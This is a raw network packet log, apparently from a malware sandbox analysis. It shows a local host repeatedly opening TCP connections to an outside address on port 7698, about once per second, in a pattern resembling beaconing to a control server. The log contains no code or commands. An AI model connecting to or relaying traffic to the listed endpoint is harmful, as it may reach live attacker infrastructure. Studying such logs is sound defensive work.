Oct 23, 2024 17:28:18.036531925 CEST	7698	49863	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:18.036674023 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:18.039537907 CEST	7698	49863	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:18.039576054 CEST	7698	49864	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:18.039781094 CEST	49864	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:18.040097952 CEST	49864	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:18.045644999 CEST	7698	49864	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:18.941849947 CEST	7698	49864	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:18.941916943 CEST	49864	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.052443027 CEST	49864	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.052889109 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.058430910 CEST	7698	49864	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:19.058449030 CEST	7698	49865	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:19.058485031 CEST	49864	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.058558941 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.058752060 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:19.064119101 CEST	7698	49865	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:19.969628096 CEST	7698	49865	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:19.971632957 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.083498001 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.083976984 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.089426041 CEST	7698	49866	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:20.089540005 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.089561939 CEST	7698	49865	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:20.089818954 CEST	49865	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.089901924 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:20.095292091 CEST	7698	49866	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:20.978683949 CEST	7698	49866	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:20.979463100 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.124495983 CEST	7698	49866	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:21.127526999 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.233633041 CEST	49866	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.240597010 CEST	7698	49866	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:21.421006918 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.428214073 CEST	7698	49867	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:21.428365946 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.438462973 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:21.444103003 CEST	7698	49867	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:22.327785015 CEST	7698	49867	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:22.327846050 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.444303036 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.444679976 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.450037003 CEST	7698	49868	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:22.450093031 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.450149059 CEST	7698	49867	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:22.450195074 CEST	49867	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.450380087 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:22.455678940 CEST	7698	49868	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:23.356657982 CEST	7698	49868	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:23.363461971 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.473885059 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.475390911 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.480072021 CEST	7698	49868	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:23.480832100 CEST	49868	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.480957031 CEST	7698	49869	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:23.481414080 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.481762886 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:23.487287998 CEST	7698	49869	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:24.371267080 CEST	7698	49869	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:24.371462107 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.490211010 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.490525007 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.495702028 CEST	7698	49870	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:24.495768070 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.495950937 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.496536016 CEST	7698	49869	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:24.497348070 CEST	49869	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:24.501267910 CEST	7698	49870	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:25.373450994 CEST	7698	49870	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:25.374228001 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.489382029 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.494029045 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.495311022 CEST	7698	49870	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:25.499623060 CEST	49870	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.499845028 CEST	7698	49871	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:25.500019073 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.507347107 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:25.512804985 CEST	7698	49871	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:26.391649961 CEST	7698	49871	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:26.391798019 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.526243925 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.526640892 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.533116102 CEST	7698	49872	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:26.533190012 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.533979893 CEST	7698	49871	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:26.534162998 CEST	49871	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.535208941 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:26.541167974 CEST	7698	49872	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:27.434158087 CEST	7698	49872	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:27.434340954 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.551876068 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.552818060 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.557657957 CEST	7698	49872	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:27.557972908 CEST	49872	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.558167934 CEST	7698	49873	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:27.559725046 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.559998989 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:27.565413952 CEST	7698	49873	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:28.438492060 CEST	7698	49873	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:28.438544989 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.552876949 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.553406000 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.558950901 CEST	7698	49873	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:28.558995008 CEST	49873	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.559020042 CEST	7698	49874	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:28.559086084 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.559322119 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:28.564855099 CEST	7698	49874	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:29.449125051 CEST	7698	49874	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:29.455492020 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.594898939 CEST	7698	49874	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:29.595621109 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.702773094 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.702874899 CEST	49874	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.708255053 CEST	7698	49875	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:29.708296061 CEST	7698	49874	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:29.708429098 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.736207008 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:29.741782904 CEST	7698	49875	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:30.606842041 CEST	7698	49875	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:30.607171059 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.727833033 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.728280067 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.733918905 CEST	7698	49875	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:30.733946085 CEST	7698	49876	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:30.733994007 CEST	49875	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.734173059 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.734698057 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:30.740127087 CEST	7698	49876	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:31.633769989 CEST	7698	49876	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:31.638169050 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.755031109 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.759466887 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.761931896 CEST	7698	49876	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:31.764961958 CEST	7698	49877	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:31.765768051 CEST	49876	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.765983105 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.765983105 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:31.771352053 CEST	7698	49877	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:32.655904055 CEST	7698	49877	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:32.655986071 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.788484097 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.789016008 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.794501066 CEST	7698	49877	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:32.794518948 CEST	7698	49878	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:32.794558048 CEST	49877	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.794616938 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.796566010 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:32.802011013 CEST	7698	49878	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:33.701345921 CEST	7698	49878	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:33.701719999 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.817125082 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.818595886 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.823122978 CEST	7698	49878	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:33.824189901 CEST	7698	49879	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:33.827601910 CEST	49878	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.827681065 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.827773094 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:33.834042072 CEST	7698	49879	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:34.733730078 CEST	7698	49879	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:34.733787060 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.849641085 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.850119114 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.855499029 CEST	7698	49880	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:34.855570078 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.855604887 CEST	7698	49879	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:34.855648994 CEST	49879	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.855789900 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:34.861409903 CEST	7698	49880	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:35.751837969 CEST	7698	49880	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:35.755640984 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.865705013 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.866621017 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.871856928 CEST	7698	49880	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:35.871977091 CEST	7698	49881	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:35.872107029 CEST	49880	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.872107029 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.872446060 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:35.877810955 CEST	7698	49881	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:36.772002935 CEST	7698	49881	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:36.772069931 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.883416891 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.883982897 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.889369011 CEST	7698	49881	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:36.889415979 CEST	7698	49882	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:36.889442921 CEST	49881	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.889492989 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.889719963 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:36.895035982 CEST	7698	49882	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:37.776861906 CEST	7698	49882	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:37.779606104 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.923257113 CEST	7698	49882	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:37.923521042 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.946396112 CEST	49882	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.947473049 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.951803923 CEST	7698	49882	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:37.952933073 CEST	7698	49883	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:37.956636906 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.956636906 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:37.962032080 CEST	7698	49883	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:38.845218897 CEST	7698	49883	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:38.845277071 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.970068932 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.970508099 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.975867987 CEST	7698	49884	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:38.975892067 CEST	7698	49883	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:38.975933075 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.976115942 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.976660967 CEST	49883	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:38.981456995 CEST	7698	49884	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:39.861202955 CEST	7698	49884	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:39.861335039 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.002901077 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.005513906 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.007122040 CEST	7698	49884	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:40.007189989 CEST	49884	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.008852959 CEST	7698	49884	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:40.011226892 CEST	7698	49885	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:40.011439085 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.011717081 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:40.017059088 CEST	7698	49885	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:40.913419008 CEST	7698	49885	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:40.913477898 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.060950994 CEST	7698	49885	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:41.061008930 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.467252970 CEST	49885	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.467739105 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.472800016 CEST	7698	49885	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:41.473175049 CEST	7698	49886	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:41.473282099 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.535171032 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:41.540909052 CEST	7698	49886	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:42.494345903 CEST	7698	49886	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:42.494448900 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.507050037 CEST	7698	49886	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:42.507119894 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.599971056 CEST	49886	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.600452900 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.606883049 CEST	7698	49886	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:42.606929064 CEST	7698	49887	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:42.607013941 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.607137918 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:42.612451077 CEST	7698	49887	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:43.496234894 CEST	7698	49887	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:43.498617887 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.620188951 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.620194912 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.625876904 CEST	7698	49888	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:43.626463890 CEST	7698	49887	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:43.626570940 CEST	49887	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.626636982 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.626815081 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:43.632333994 CEST	7698	49888	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:44.533894062 CEST	7698	49888	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:44.534466982 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.646493912 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.646951914 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.652848959 CEST	7698	49888	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:44.652894974 CEST	49888	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.652998924 CEST	7698	49889	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:44.653063059 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.653307915 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:44.658797026 CEST	7698	49889	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:45.571780920 CEST	7698	49889	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:45.575608015 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.682159901 CEST	7698	49889	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:45.683670044 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.692447901 CEST	49889	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.692456007 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.697912931 CEST	7698	49889	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:45.697940111 CEST	7698	49890	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:45.699572086 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.703481913 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:45.708914042 CEST	7698	49890	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:46.585963011 CEST	7698	49890	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:46.586052895 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.694247007 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.694966078 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.701282978 CEST	7698	49890	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:46.701301098 CEST	7698	49891	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:46.701345921 CEST	49890	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.701419115 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.701731920 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:46.707389116 CEST	7698	49891	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:47.596668959 CEST	7698	49891	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:47.596787930 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.709629059 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.710216999 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.715687037 CEST	7698	49892	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:47.715816975 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.716088057 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.716193914 CEST	7698	49891	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:47.716424942 CEST	49891	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:47.721524000 CEST	7698	49892	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:48.600415945 CEST	7698	49892	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:48.600518942 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.709911108 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.710414886 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.932615042 CEST	7698	49892	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:48.932687998 CEST	49892	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.934182882 CEST	7698	49892	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:48.934218884 CEST	7698	49893	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:48.934298038 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.934627056 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:48.939984083 CEST	7698	49893	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:49.819363117 CEST	7698	49893	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:49.820833921 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.926769972 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.926776886 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.932609081 CEST	7698	49894	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:49.932724953 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.932810068 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.935355902 CEST	7698	49893	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:49.935575962 CEST	49893	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:49.938949108 CEST	7698	49894	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:50.832847118 CEST	7698	49894	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:50.833141088 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:50.979357004 CEST	7698	49894	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:50.979444027 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:50.991239071 CEST	49894	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:50.991950035 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:50.997210979 CEST	7698	49894	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:50.997481108 CEST	7698	49895	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:50.997718096 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:50.998255014 CEST	49895	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:51.003827095 CEST	7698	49895	79.124.58.130	192.168.2.8
